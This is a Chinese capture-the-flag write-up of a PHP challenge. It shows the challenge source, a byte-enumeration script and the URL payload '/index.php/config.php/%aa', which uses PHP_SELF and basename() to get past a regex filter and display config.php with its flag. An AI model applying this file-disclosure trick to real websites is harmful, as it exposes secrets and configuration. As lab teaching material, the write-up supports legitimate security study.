|
代码审计,依旧有我们的老朋友preg_match,不会还有一个新朋友basename()
先看源码
<?php
include 'config.php'; // FLAG is defined in config.php
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("I don't know what you are thinking, but I won't let you read it :)");
}
if (isset($_GET['source'])) {
highlight_file(basename($_SERVER['PHP_SELF']));
exit();
}
$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
$guess = (string) $_POST['guess'];
if (hash_equals($secret, $guess)) {
$message = 'Congratulations! The flag is: ' . FLAG;
} else {
$message = 'Wrong.';
}
}
?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Can you guess it?</title>
</head>
<body>
<h1>Can you guess it?</h1>
<p>If your guess is correct, I'll give you the flag.</p>
<p><a href="?source">Source</a></p>
<hr>
<?php if (isset($message)) { ?>
<p><?= $message ?></p>
<?php } ?>
<form action="index.php" method="POST">
<input type="text" name="guess">
<input type="submit">
</form>
</body>
</html>
$_SERVER[‘PHP_SELF’]用于获取当前带后缀的文件名,但由于apache的解析特性,他调用的其实是第一个文件后缀名
也就是说如果我的url是http://061f3b45-b4b9-4436-a86b-80baa90c1f7f.node4.buuoj.cn:81/index.php/config.php
他其实跳转到的是index.php页面
而basename函数则不同了,他读取的是最后一个后缀,这题考的其实也就是这个
$_SERVER[‘PHP_SELF’]是/index.php/config.php
到了basename里面他读到的是config.php,然后higlight_file
小demo:
<?php
$url='/index.php/config.php';
echo basename($url);
?>
下面问题就一个了,怎么绕过那么preg_match
preg_match(’/config.php/*$/i’, $_SERVER[‘PHP_SELF’])
写个脚本:
<?php
for($i=0;$i<255;$i++){
$str="/index.php/config.php/".chr($i);
preg_match('/config\.php\/*$/i', $str);
echo $i.":".basename($str);
echo "\n";
}
?>
这个正则匹配的是config.php结尾,其实只要后面有东西,除了%0A这些你告诉他正则匹配结束的,都会绕过的
以%aa为例,payload:/index/php/config.php/%aa
preg_match(’/config.php/*$/i’, $_SERVER[‘PHP_SELF’],由于他是%aa结尾,当然会过这个正则
到了basename这里,它会自动把%aa去掉,因为basename不接受大于128的ascii字符
于是自动被处理成了/index.php/config.php/,输出结果为config.php
参考视频链接:https://www.bilibili.com/video/BV1RU4y1Z71D/
|